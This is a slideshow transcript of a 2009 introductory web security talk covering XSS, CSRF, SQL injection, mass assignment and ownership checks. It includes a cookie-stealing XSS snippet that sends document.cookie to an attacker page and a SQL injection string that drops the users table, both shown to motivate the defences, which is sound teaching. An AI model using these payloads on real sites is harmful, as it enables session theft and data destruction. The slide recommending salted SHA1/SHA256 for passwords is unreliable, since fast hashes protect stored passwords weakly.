Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

2009 Barcamp Nashville Web Security 101


Published on

A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:

Published in: Technology
  • Be the first to comment

2009 Barcamp Nashville Web Security 101

  1. 1. Web Security 101
  2. 2. Who is this guy? Brian Dailey realm3 web applications
  3. 3. Security is serious.
  4. 4. Even when you might think it's not.
  5. 5. TRUST ME Security is all about trust.
  6. 6. Physical Network Server Application
  7. 7. XSS The user believes you are this guy: But this guy is really watching:
  8. 8. XSS: Methods Non-persistent: Entice user to load page (either by clicking a link or a hidden frame) and inject client-side script. Persistent: Save to the database and get users to load the page with the client-side script.
  9. 9. XSS Give me back my session! <script> document.write('<img src=” me.php?cookie=' + document.cookie + '” width=”1” height=”1” />'); </script>
  10. 10. XSS Another example: Embed a form that captures a saved password, collect it. If you can inject Javascript or HTML, you can do all sorts of nefarious things.
  11. 11. XSS Prevention Always Escape Output How you escape depends upon context. <ul><li>URL Encoded
  12. 12. HTML Entities
  13. 13. White listing HTML tags (black listing is tricky!) </li></ul>
  14. 14. CSRF (Cross-site Request Forgery) Exploit server's trust of user.
  15. 15. CSRF You think this is your user: But really it is:
  16. 16. CSRF Example: <img src=” ” height=”1” width=”1” /> Works especially well with GET requests, but using POST is not a surefire way to prevent this.
  17. 17. CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
  18. 18. SQL Injection
  19. 19. SQL Injection String sql = “SELECT * FROM users WHERE name LIKE '%” + name + “'”; ”;+DROP+TABLE+USERS--
  20. 20. SQL Injection Prevention This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.) String sql = &quot;SELECT * FROM users WHERE name LIKE ?&quot;; java.sql.PreparedStatement stmt = Conn.prepareStatement(sql); stmt.setString(1, request.getParameter(&quot;name&quot;));
  21. 21. Frameworks are helpful.
  22. 22. They can come with their own set of issues.
  23. 23. Mass Assignment
  24. 24. Mass Assignment Rails Example: @user = User.find( @user.update_attributes(params[:user]) If I POST user[is_admin] = 1 W00t! I pwned u! Fix by using attr_accessible (in model) or by whitelisting.
  25. 25. Mass Assignment Symfony: If you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP: # Anything about $this->data could be changed! # This makes me sad. $this->Post->save($this->data);
  26. 26. Ownership
  27. 27. Ownership Authorization Rails: # bad @post = Post.find(params[:id]) # good @post = current_user.posts.find(params[:id])
  28. 28. Ownership Authorization CakePHP: // bad $post = $this->Post->findById($id); // good $post = $this->Post->find( array('conditions' => array( 'id' => $id, 'user_id' => $this->Auth->user('id'), ) );
  29. 29. Ownership Authorization Symfony: // bad $post = Doctrine::getTable('Post')->find($id); // good $post = Doctrine_Query::create() ->select('*') ->from('Post p') ->where(' = ?', $id) ->where('p.user_id = ?', $user_id );
  30. 30. Other Considerations > Rate limit user login attempts to prevent brute-force attacks. + Use caching (memcache) to track attempts. > Always apply hash to user passwords + Md5 is no good, use Sha1, Sha256 & Salt Useful Resources Potential Attacks Overview (OWASP has a ton of info!) Google Code University on Web Security Rails Security Guide
  31. 31. Wrapping Things Up DO: Assume that users can be malicious. Assume that your data is important (it should be!) DON'T: Assume your framework handles all security concerns. Assume your application is “unbreakable.”
  32. 32. Thanks! Any questions? Brian Dailey realm3 web applications Web: Twitter: @brian_dailey Email: Phone: 917-512-3594 slide-bg: Kudos to: